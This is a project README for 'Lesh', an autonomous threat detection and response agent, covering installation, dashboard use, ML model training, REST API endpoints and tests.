An intelligent security solution that autonomously detects and responds to cybersecurity threats in real-time, combining traditional rule-based detection methods with advanced machine learning algorithms.
- Overview
- Key Features
- Installation
- Quick Start Guide
- Configuration
- Detection Modules
- Dashboard
- Machine Learning Models
- API Reference
- Development
- Testing
- License
- Troubleshooting
Lesh is a comprehensive security solution designed to monitor, detect, and automatically respond to cyber threats with minimal human intervention. It leverages both rule-based detection and advanced machine learning to identify known and unknown threats, providing robust protection for your infrastructure.
- Network Anomaly Detection: Identifies unusual patterns in network traffic
- Malware Detection: Scans for malicious software and suspicious behaviors
- Compliance Checking: Ensures system configurations adhere to security best practices
- Machine Learning-based Detection: Uses isolation forest algorithm for anomaly detection
- Automated threat containment: Isolation of compromised systems
- Connection blocking: Prevention of malicious network traffic
- Process termination: Stopping of suspicious executables
- Notification systems: Email alerts for security incidents
- Interactive Dashboard: Real-time monitoring of security events
- System Health Monitoring: Track system resource usage
- Security Events Timeline: Chronological view of detected threats
- Severity Distribution: Visual breakdown of threat severity
- Python 3.8 or higher
- pip package manager
# Clone the repository
git clone https://github.com/your-username/autonomous-cybersec-agent.git
cd autonomous-cybersec-agent
# Create and activate a virtual environment
python -m venv venv
source venv/bin/activate # On Windows: venv\Scripts\activate
# Install dependencies
pip install -r requirements.txt
# Install in development mode
pip install -e .- Run the complete agent with dashboard and API:
python run.py --all- Run only specific components:
# Run only the dashboard
python run.py --dashboard
# Run only the API server
python run.py --api
# Run only the security agent
python run.py --agent- Access the dashboard:
Open your web browser and navigate to: http://localhost:8050
The agent includes several detection modules:
Monitors network traffic for unusual patterns such as:
- Connection count spikes
- Bandwidth usage anomalies
- Packet rate anomalies
Scans for malicious software by:
- Checking file hashes against known malware signatures
- Analyzing file contents for suspicious patterns
- Focusing on potentially dangerous file types
Ensures system configuration meets security best practices:
- Password policy compliance
- Firewall configuration
- System update settings
- Running services audit
The dashboard provides real-time monitoring and visualization:
- Active Threats Counter: Number of current high-severity threats
- Events Today: Count of security events in the past 24 hours
- System Health: Overall status based on system metrics
- Security Events Timeline: Chronological view of detected threats
- Event Severity Distribution: Breakdown of threats by severity level
- System Metrics: CPU, memory, disk usage, and network traffic
To access the dashboard, run:
python run.py --dashboardThe new dashboard provides real-time monitoring with advanced visualization capabilities:
- Interactive Security Visualizations: Dynamic threat maps, timelines, and 3D visualizations
- Real-time Metrics: Active threats, system health, and security event tracking
- Multi-tab Interface: Organize security data into Overview, Network, System, Alerts and Advanced tabs
- Advanced Analytics: AI-powered threat analysis and predictive metrics
To run the dashboard:
# Install required dependencies first
pip install -r requirements.txt
# Start the dashboard
python run.py --dashboard
# Or run all components together
python run.py --allThen open your web browser and navigate to: http://localhost:8050
- Security Status Monitoring: Real-time status indicators show current threat levels
- Threat Analysis: View detailed breakdowns of security events by severity and type
- Network Visualization: Interactive network topology map showing attack patterns
- System Health: Monitor system resource usage and health metrics
- Alert Management: Filter and review security alerts by severity
- Advanced 3D Visualization: Explore the threat landscape in 3D with the advanced view
The agent uses machine learning for advanced threat detection:
- Anomaly Detector: Identifies unusual network traffic patterns
- Threat Classifier: Categorizes detected anomalies by threat type
- Behavior Analyzer: Tracks and flags unusual system behavior
To train the machine learning models:
python train_models.pyTo train with custom data:
python train_models.py --data your_data.csvEdit the ML configuration file:
nano config/ml_models.jsonThe agent provides a REST API for integration with other tools.
python run.py --api| Endpoint | Method | Description |
|---|---|---|
/ |
GET | API information and status |
/detect |
POST | Submit traffic data for anomaly detection |
/explain |
POST | Get explanations for detected anomalies |
/status |
GET | Get agent status information |
Run the test suite to ensure everything is working:
pytest tests/For specific test files:
pytest tests/test_anomaly_detector.py
pytest tests/test_email_notifications.py
pytest tests/test_dashboard.pyThis project is licensed under the MIT License - see the LICENSE file for details.
- Import errors: Make sure all dependencies are installed with
pip install -r requirements.txt - Permission issues: Some detection and response capabilities require administrative privileges
- Dashboard not loading: Check if the correct port (8050) is available
- ML models not working: Ensure models are trained before trying to use them
If you encounter any problems, please open an issue on the GitHub repository.